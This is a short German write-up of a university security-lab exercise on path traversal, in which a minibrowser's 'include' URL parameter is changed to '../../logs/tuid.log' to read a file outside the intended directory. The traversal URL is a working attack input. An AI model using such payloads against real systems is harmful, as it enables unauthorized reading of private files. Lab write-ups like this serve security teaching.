# Path Traversal

Gegeben ist ein Minibrowser ohne URL-Leiste.
Ziel ist das Einlesen von Dateien,
auf die wir eigentlich keinen Zugriff haben sollen.

![](path-traversal.png)

## Lösung

Laut dem Hinweis sollen wir die URL im Browser anschauen:
```
https://securitylab.sit.tu-darmstadt.de/index.php/task/show/546?include=start.php
```
Die Beschreibung weist uns auf `start.php` hin:
```
[unknown]/logs/tuid.log
[unknown]/public_html/views/start.php
```
Wir können mittels [`..` auf Elternverzeichnisse zugreifen](https://superuser.com/questions/153165/what-does-represent-while-giving-path/153175#153175):
```
https://securitylab.sit.tu-darmstadt.de/index.php/task/show/546?include=../../logs/tuid.log
```
